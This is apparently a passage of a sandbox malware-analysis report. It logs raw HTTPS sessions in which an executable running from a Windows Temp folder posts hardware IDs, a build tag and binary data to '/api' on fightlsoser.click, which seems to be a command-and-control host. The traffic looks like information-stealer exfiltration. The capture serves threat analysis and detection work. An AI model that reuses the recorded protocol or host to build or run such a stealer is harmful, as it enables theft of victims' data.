                                                                                                                                                                                                                                                2024-12-13 12:53:37 UTC1369INData Raw: 48 54 68 45 6f 34 45 4b 74 39 72 2f 47 6e 30 46 53 48 39 51 2b 6c 44 74 46 6d 42 36 4d 56 4f 67 78 45 4a 63 4c 61 63 65 4f 4e 51 66 2b 31 65 77 45 41 67 78 7a 6d 72 4c 74 30 58 4f 66 68 4b 34 45 2b 70 53 73 72 34 6a 55 58 50 47 42 63 31 2f 4d 34 37 70 68 74 38 39 52 4b 59 42 42 76 41 4f 37 51 71 6d 43 38 6b 36 56 62 73 52 61 34 43 33 72 6d 53 46 38 51 61 52 57 69 75 32 6e 54 68 57 48 54 73 57 38 78 4a 4b 4d 34 75 70 53 2f 65 46 44 6a 71 52 75 46 4a 70 30 6a 43 39 6f 46 65 78 42 34 43 4d 2f 79 63 4e 61 68 63 59 36 30 4b 67 47 30 71 31 53 57 30 61 63 56 51 4b 36 70 48 36 77 6a 36 41 73 58 39 68 46 50 45 47 67 4d 31 36 4e 46 36 35 31 70 37 34 6c 62 4c 54 53 76 47 4a 71 45 6b 33 67 77 34 34 55 2f 72 51 61 35 50 67 62 6e 4c 55 4e 74 57 58 58 44 66 30 58 58 6d
                                                                                                                                                                                                                                                Data Ascii: HThEo4EKt9r/Gn0FSH9Q+lDtFmB6MVOgxEJcLaceONQf+1ewEAgxzmrLt0XOfhK4E+pSsr4jUXPGBc1/M47pht89RKYBBvAO7QqmC8k6VbsRa4C3rmSF8QaRWiu2nThWHTsW8xJKM4upS/eFDjqRuFJp0jC9oFexB4CM/ycNahcY60KgG0q1SW0acVQK6pH6wj6AsX9hFPEGgM16NF651p74lbLTSvGJqEk3gw44U/rQa5PgbnLUNtWXXDf0XXm
                                                                                                                                                                                                                                                2024-12-13 12:53:37 UTC1369INData Raw: 6a 4c 51 53 44 4b 4a 71 63 76 33 42 55 2b 2b 45 6e 6e 53 36 6b 43 6a 37 65 4d 54 34 4e 4f 52 52 50 35 79 6e 48 76 56 32 33 6d 55 38 4e 53 49 4e 64 72 36 6d 6e 4c 47 53 4f 71 47 50 46 59 74 55 58 65 75 5a 49 58 78 42 70 46 61 4b 37 61 63 75 35 63 66 65 4e 41 78 55 49 69 79 43 4b 74 4c 64 49 64 4d 75 35 45 34 45 32 68 54 73 72 77 69 46 6a 48 48 77 73 35 34 5a 77 31 71 46 78 6a 72 51 71 41 5a 54 62 45 4a 36 6c 70 78 56 41 72 71 6b 66 72 43 50 6f 43 7a 66 6d 4f 56 38 6b 51 41 54 58 6f 31 6e 37 6f 55 48 6a 69 56 73 5a 41 49 73 63 67 72 53 6a 63 47 7a 6a 68 52 75 70 4c 70 45 53 42 75 63 74 51 32 31 5a 64 63 4d 37 48 64 75 52 63 4f 2f 49 63 32 51 51 71 79 32 76 38 61 64 45 53 4e 75 31 41 36 6b 75 71 52 38 58 39 6a 6c 66 4c 42 41 30 77 36 63 35 70 36 46 4a 2b 34
                                                                                                                                                                                                                                                Data Ascii: jLQSDKJqcv3BU++EnnS6kCj7eMT4NORRP5ynHvV23mU8NSINdr6mnLGSOqGPFYtUXeuZIXxBpFaK7acu5cfeNAxUIiyCKtLdIdMu5E4E2hTsrwiFjHHws54Zw1qFxjrQqAZTbEJ6lpxVArqkfrCPoCzfmOV8kQATXo1n7oUHjiVsZAIscgrSjcGzjhRupLpESBuctQ21ZdcM7HduRcO/Ic2QQqy2v8adESNu1A6kuqR8X9jlfLBA0w6c5p6FJ+4
                                                                                                                                                                                                                                                2024-12-13 12:53:37 UTC279INData Raw: 74 31 53 69 30 4b 74 55 50 44 4b 6f 59 2f 6e 62 69 53 64 66 77 6d 31 54 56 48 51 67 38 2f 2b 49 37 73 41 38 70 76 77 43 53 46 6a 4b 48 4e 4a 74 6e 6d 68 39 79 73 6e 6e 2b 43 4c 51 43 6d 61 58 46 46 39 46 57 58 58 43 70 33 32 6e 36 58 58 6a 37 55 59 64 36 45 2b 41 39 72 69 37 4b 47 53 58 6c 41 4b 6b 49 72 51 4b 5a 7a 73 74 65 78 41 30 55 4a 75 50 4d 66 4b 68 6b 4e 61 31 4b 67 42 78 74 38 69 69 71 4a 39 30 49 49 36 64 6e 38 55 4b 6c 55 73 62 67 68 42 65 4e 56 67 4e 77 74 6f 38 31 71 46 39 71 72 51 71 51 46 6e 61 53 65 50 4e 35 69 41 46 38 38 77 44 78 43 50 6f 51 6a 37 65 5a 46 35 74 57 51 6a 50 38 7a 6e 33 72 54 58 69 71 62 50 35 6a 4e 38 6f 74 73 7a 6a 6b 49 44 58 77 54 65 46 66 73 77 37 55 39 49 56 5a 78 41 42 46 66 71 37 54 4f 37 42 69 4f 36 55 53 2f 77
                                                                                                                                                                                                                                                Data Ascii: t1Si0KtUPDKoY/nbiSdfwm1TVHQg8/+I7sA8pvwCSFjKHNJtnmh9ysnn+CLQCmaXFF9FWXXCp32n6XXj7UYd6E+A9ri7KGSXlAKkIrQKZzstexA0UJuPMfKhkNa1KgBxt8iiqJ90II6dn8UKlUsbghBeNVgNwto81qF9qrQqQFnaSePN5iAF88wDxCPoQj7eZF5tWQjP8zn3rTXiqbP5jN8otszjkIDXwTeFfsw7U9IVZxABFfq7TO7BiO6US/w
                                                                                                                                                                                                                                                2024-12-13 12:53:37 UTC1369INData Raw: 32 62 66 30 0d 0a 6a 55 44 53 56 6b 74 77 36 4a 77 6a 75 42 55 37 36 55 4f 41 48 48 32 56 63 50 46 36 6a 55 35 67 39 51 37 2b 43 4c 51 43 6d 61 58 46 46 39 46 57 58 58 43 70 33 32 6e 36 58 58 6a 37 55 59 64 36 45 2b 6b 73 6f 69 7a 64 44 6e 44 45 53 2f 4e 50 34 67 79 42 2b 4d 73 50 2b 6c 5a 4e 63 4e 47 53 4f 2f 41 62 49 36 31 6e 77 30 6f 6a 77 44 32 31 5a 50 51 5a 4e 4f 39 48 39 77 71 4d 53 64 58 77 79 78 6d 44 45 45 56 6f 76 70 49 37 37 45 6f 37 74 51 4b 53 48 33 69 55 66 50 52 37 78 56 41 72 71 6c 61 6e 45 50 41 4d 67 65 58 4c 44 34 4e 52 42 69 4c 38 32 6e 6a 2b 57 44 7a 54 62 4d 4e 53 49 4d 67 67 70 52 66 6b 4d 44 2f 72 51 2b 6b 4b 6b 31 54 4d 35 34 68 53 78 43 67 37 50 75 6e 49 66 4f 5a 64 65 36 30 63 67 45 74 74 6e 78 4c 6b 59 5a 6f 68 66 4b 70 59 70
                                                                                                                                                                                                                                                Data Ascii: 2bf0jUDSVktw6JwjuBU76UOAHH2VcPF6jU5g9Q7+CLQCmaXFF9FWXXCp32n6XXj7UYd6E+ksoizdDnDES/NP4gyB+MsP+lZNcNGSO/AbI61nw0ojwD21ZPQZNO9H9wqMSdXwyxmDEEVovpI77Eo7tQKSH3iUfPR7xVArqlanEPAMgeXLD4NRBiL82nj+WDzTbMNSIMggpRfkMD/rQ+kKk1TM54hSxCg7PunIfOZde60cgEttnxLkYZohfKpYp
                                                                                                                                                                                                                                                2024-12-13 12:53:37 UTC1369INData Raw: 57 70 39 6c 49 6a 51 39 46 4a 71 36 45 4b 61 59 62 61 61 30 4b 67 41 4d 75 31 54 6d 69 4b 73 77 64 64 64 52 2b 77 45 61 6c 51 39 66 6e 68 6c 76 69 46 52 51 36 30 4f 4a 75 36 31 56 31 36 6b 54 52 42 47 4f 48 4a 4f 52 78 34 31 35 36 71 6e 2b 70 43 4c 6f 43 6d 62 65 2b 56 4d 30 59 41 69 62 2f 6b 56 7a 6d 58 48 72 37 51 73 31 49 44 4d 51 36 72 6d 6d 55 58 6a 53 71 47 4c 55 47 34 6b 62 51 74 39 4d 48 6b 55 31 51 59 37 6d 4d 4b 66 63 56 59 71 31 45 67 42 78 2f 69 57 75 32 61 59 4a 65 64 65 6c 53 39 55 36 68 56 4d 4b 77 74 57 6e 6d 41 51 59 67 36 4e 39 46 31 6e 42 33 36 31 58 61 51 79 76 68 43 2b 52 6e 6d 68 46 79 73 6e 6d 6e 41 4f 4a 39 6a 37 65 54 46 35 74 57 4d 44 50 67 30 6e 7a 2b 53 6a 62 49 52 63 4e 55 4b 38 52 72 36 6d 6e 63 58 6d 71 36 44 71 64 4d 73 77
                                                                                                                                                                                                                                                Data Ascii: Wp9lIjQ9FJq6EKaYbaa0KgAMu1TmiKswdddR+wEalQ9fnhlviFRQ60OJu61V16kTRBGOHJORx4156qn+pCLoCmbe+VM0YAib/kVzmXHr7Qs1IDMQ6rmmUXjSqGLUG4kbQt9MHkU1QY7mMKfcVYq1EgBx/iWu2aYJedelS9U6hVMKwtWnmAQYg6N9F1nB361XaQyvhC+RnmhFysnmnAOJ9j7eTF5tWMDPg0nz+SjbIRcNUK8Rr6mncXmq6DqdMsw


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                39192.168.2.450257104.21.35.434437924C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:36 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=NG3PNHQ8W1UK9V
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 18142
                                                                                                                                                                                                                                                Host: fightlsoser.click
                                                                                                                                                                                                                                                2024-12-13 12:53:36 UTC15331OUTData Raw: 2d 2d 4e 47 33 50 4e 48 51 38 57 31 55 4b 39 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 42 38 43 30 43 33 34 38 38 46 39 39 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4e 47 33 50 4e 48 51 38 57 31 55 4b 39 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 47 33 50 4e 48 51 38 57 31 55 4b 39 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 4d 42 73 54 77 2d 2d 49 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 4e 47 33 50 4e
                                                                                                                                                                                                                                                Data Ascii: --NG3PNHQ8W1UK9VContent-Disposition: form-data; name="hwid"6AB8C0C3488F994123D904AF30EFEBBC--NG3PNHQ8W1UK9VContent-Disposition: form-data; name="pid"2--NG3PNHQ8W1UK9VContent-Disposition: form-data; name="lid"cMBsTw--Installs--NG3PN
                                                                                                                                                                                                                                                2024-12-13 12:53:36 UTC2811OUTData Raw: 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43
                                                                                                                                                                                                                                                Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wEC
                                                                                                                                                                                                                                                2024-12-13 12:53:37 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:37 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=dsrcabju1hd4mivad3pujb1tuq; expires=Tue, 08-Apr-2025 06:40:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bjOBYp3TD0emgOklPxy9nSXCvgpgeP8WtuVY0yNRxmebZ3FoiocagwbBckEAcSuD1LqyyJsZVGgAsb05DxNYaw34Fcu4atUnhXPptfDmKyIczHIcryS1JGtUmlsCt2xYBEbVpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f16191aafb64207-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1588&rtt_var=596&sent=17&recv=22&lost=0&retrans=0&sent_bytes=2842&recv_bytes=19101&delivery_rate=1834170&cwnd=183&unsent_bytes=0&cid=4232174d9af2347b&ts=990&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:53:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                2024-12-13 12:53:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                40192.168.2.450273104.21.35.434437924C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:42 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=B5QPSWJIMZAQ4A3
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 8769
                                                                                                                                                                                                                                                Host: fightlsoser.click
                                                                                                                                                                                                                                                2024-12-13 12:53:42 UTC8769OUTData Raw: 2d 2d 42 35 51 50 53 57 4a 49 4d 5a 41 51 34 41 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 42 38 43 30 43 33 34 38 38 46 39 39 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 42 35 51 50 53 57 4a 49 4d 5a 41 51 34 41 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 35 51 50 53 57 4a 49 4d 5a 41 51 34 41 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 4d 42 73 54 77 2d 2d 49 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 42 35
                                                                                                                                                                                                                                                Data Ascii: --B5QPSWJIMZAQ4A3Content-Disposition: form-data; name="hwid"6AB8C0C3488F994123D904AF30EFEBBC--B5QPSWJIMZAQ4A3Content-Disposition: form-data; name="pid"2--B5QPSWJIMZAQ4A3Content-Disposition: form-data; name="lid"cMBsTw--Installs--B5
                                                                                                                                                                                                                                                2024-12-13 12:53:44 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:44 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=jhpjvv6ad6uvuk0tttb6vq2t7n; expires=Tue, 08-Apr-2025 06:40:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4iNqrXPqvWbNbvUs0ICBIofJZm3sHHfyIXYLEkNTUMTG0Bg0f3bo8cIZkpOjOkNowIjvKdCnFnmEa8VLT77qjiBEGWXrCo7fS60XwfTvHq1leSLVAolq6k3M8m3d5ftEUxvV%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f16193ffc4c1906-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1536&rtt_var=681&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2842&recv_bytes=9706&delivery_rate=1901041&cwnd=252&unsent_bytes=0&cid=9a12091bebfc714a&ts=1602&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:53:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                2024-12-13 12:53:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                41192.168.2.450294104.21.35.434437924C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:49 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=5QCBRIPHK
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 20386
                                                                                                                                                                                                                                                Host: fightlsoser.click
                                                                                                                                                                                                                                                2024-12-13 12:53:49 UTC15331OUTData Raw: 2d 2d 35 51 43 42 52 49 50 48 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 42 38 43 30 43 33 34 38 38 46 39 39 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 35 51 43 42 52 49 50 48 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 51 43 42 52 49 50 48 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 4d 42 73 54 77 2d 2d 49 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 35 51 43 42 52 49 50 48 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                                Data Ascii: --5QCBRIPHKContent-Disposition: form-data; name="hwid"6AB8C0C3488F994123D904AF30EFEBBC--5QCBRIPHKContent-Disposition: form-data; name="pid"3--5QCBRIPHKContent-Disposition: form-data; name="lid"cMBsTw--Installs--5QCBRIPHKContent-D
                                                                                                                                                                                                                                                2024-12-13 12:53:49 UTC5055OUTData Raw: 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29
                                                                                                                                                                                                                                                Data Ascii: lrQMn 64F6(X&7~`aO@dR<x)
                                                                                                                                                                                                                                                2024-12-13 12:53:50 UTC1030INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:50 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=9vfvgii9fd446og7f4j04au3b1; expires=Tue, 08-Apr-2025 06:40:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NJsnJnzyjq%2Fx6Mu1Gj2tymLuTs1Y%2FvoZKGmCAM%2BhgyBwnteYKe13QV4IOsurQCLmxbdRxc2nGjWvVd8%2FKkuvxzlDiO%2FyCcuijMsEMq%2BVvgvWXqPTmDXhdHy0A384jiZQs%2BGYww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f161968eecc41af-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1627&rtt_var=612&sent=30&recv=38&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21340&delivery_rate=1787025&cwnd=224&unsent_bytes=0&cid=4186f2dfa50bfac5&ts=1342&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:53:50 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                2024-12-13 12:53:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                42192.168.2.450323104.21.35.434437924C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:00 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=IT62TMGSLUFOEMK9
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 3613
                                                                                                                                                                                                                                                Host: fightlsoser.click
                                                                                                                                                                                                                                                2024-12-13 12:54:00 UTC3613OUTData Raw: 2d 2d 49 54 36 32 54 4d 47 53 4c 55 46 4f 45 4d 4b 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 42 38 43 30 43 33 34 38 38 46 39 39 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 49 54 36 32 54 4d 47 53 4c 55 46 4f 45 4d 4b 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 54 36 32 54 4d 47 53 4c 55 46 4f 45 4d 4b 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 4d 42 73 54 77 2d 2d 49 6e 73 74 61 6c 6c 73 0d 0a 2d
                                                                                                                                                                                                                                                Data Ascii: --IT62TMGSLUFOEMK9Content-Disposition: form-data; name="hwid"6AB8C0C3488F994123D904AF30EFEBBC--IT62TMGSLUFOEMK9Content-Disposition: form-data; name="pid"1--IT62TMGSLUFOEMK9Content-Disposition: form-data; name="lid"cMBsTw--Installs-
                                                                                                                                                                                                                                                2024-12-13 12:54:02 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:02 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=ooor106fq2ib3gsinrllh8f7f3; expires=Tue, 08-Apr-2025 06:40:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3rZna1rw2qk1bS6HW8xV0c0zHq7c9ZFTF7ADY28SQVaz35hdLlLlMAJcjFIRBofeXE1y17w0TNe6ot1Zj1iSuseQDLcyKJxHFsfxCkrleTTjtZZuacD32v0vNlaNVpTv1fK1dw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f1619ab9f798cda-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1948&rtt_var=768&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2843&recv_bytes=4529&delivery_rate=1391138&cwnd=242&unsent_bytes=0&cid=64e5f1274826f026&ts=2440&x=0"
